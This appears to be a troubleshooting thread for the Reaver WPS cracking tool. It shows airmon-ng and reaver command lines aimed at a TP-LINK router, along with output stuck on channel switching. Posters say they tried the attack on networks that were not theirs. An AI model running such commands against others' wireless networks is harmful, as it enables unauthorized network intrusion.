Reaver does not initiate the attack

Hello, I've tried everything to get back to work here, but it seems that is not 
working, I read a lot about the mistakes to recover before coming here to post, 
below for more details.

1. What operating system are you using (Linux is the only supported OS)? BT5

2. Is your wireless card in monitor mode (yes/no)?
Yes 'airmon-ng start wlan0 '
3. What is the signal strength of the Access Point you are trying to crack? -39

4. What is the manufacturer and model # of the device you are trying to
crack? TP-LINK TL-WR541G

5. What is the entire command line string you are supplying to reaver?
reaver -i mon0 -b
reaver -i mon0 -b 00:26:F2:0C:9A:D4 --mac 10:13:EE:03:80:81 -vv --no-nacks
reaver -i mon0 -b 00:26:F2:0C:9A:D4 --mac 10:13:EE:03:80:81 -vv --dh-small
reaver -i mon0 -b 00:26:F2:0C:9A:D4 --mac 10:13:EE:03:80:81 -vv -d 0
reaver -i mon0 -b 000:26:F2:0C:9A:D4 --mac 10:13:EE:03:80:81 -vv -d 1
6. Please describe what you think the issue is.

7. Paste the output from Reaver below.

[+] Waiting for beacon from 00:26:F2:0C:9A:D4
[+] Switching mon0 to channel 1
[+] Switching mon0 to channel 2

and nothing happens, is so .. hours
I've tried with various networks without being mine and also the same thing 
happens

Hi,

I am having the same issue and never cracked a single password using reaver. 
Just wondered if you managed to solved your issue, most importantly, has it 
ever worked?

same problem continously switch to channel but not intiate the crack if any one 
have solution then pls help..................

yeah, just continuously switching channels. Ironically, it works well when I 
test with my own router =)
